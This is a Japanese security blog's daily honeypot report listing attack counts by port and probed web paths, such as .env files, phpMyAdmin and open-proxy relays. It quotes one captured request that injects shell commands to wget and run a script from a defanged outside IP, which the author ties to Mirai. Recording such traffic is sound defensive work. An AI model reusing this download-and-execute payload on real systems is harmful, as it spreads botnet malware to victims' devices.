sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(304日目:6/16)

Honeypot簡易分析(303日目:6/16)となります。

◾️Honeypot

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190617073420p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	3394	-595
23	telnet	1437	-208
33923	Unknown	448	448
5900	vnc	390	-4763
3389	rdp	292	-19
3306	mysql	141	-99
2323	telnet	134	20
54984	Unknown	84	81
443	https	67	10
139	netbios-ssn	55	38

＜新規マルウェアダウンロード＞

マルウェアダウンロード	ペイロード
hxxp://185[.]172[.]110[.]226/lmaoWTF/Jaws.sh	GET /shell?cd%20/tmp;wget%20hxxp:/%5C/185[.]172[.]110[.]226/lmaoWTF/Jaws.sh;%20chmod%20777%20Jaws.sh;sh%20Jaws.sh;%20rm%20-rf%20Jaws.sh HTTP/1.1 Host: xxx.xxx.xxx.xxx:60001 User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.el6.x86_64

shファイルを経由してMiraiのダウンロードを狙ったものでした。
https://www.virustotal.com/gui/file/03757578b9279bab0cc4ff8565d30aa4de847aec4f799f33d091c287fd8c0e40/detection

◾️WoWHoneeypot

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190617073830p:plain

＜検知パス一覧＞

wow_path_research	target	CVE	reference	count
/	-	-	-	25
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	25
www[.]baidu[.]com:443	Unauthorized Relay	-	-	3
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-	2
hxxp://www[.]baidu[.]com/	Unauthorized Relay	-	-	2
/html/.env	.env file	-	-	1
/index.php	-	-	-	1
/phpmyadmin/index.php	phpMyAdmin	-	-	1
cn[.]bing[.]com:443	Unauthorized Relay	-	-	1
hxxp://123[.]125[.]114[.]144/	Unauthorized Relay	-	-
hxxp://172[.]247[.]32[.]25/ddd.html	Unauthorized Relay	-	-	1
hxxp://www[.]123cha[.]com/	Unauthorized Relay	-	-	1
hxxp://www[.]ip[.]cn/	Unauthorized Relay	-	-	1

＜新規検知パス一覧＞
なし

＜マルウェアダウンロード＞
なし

以上となります。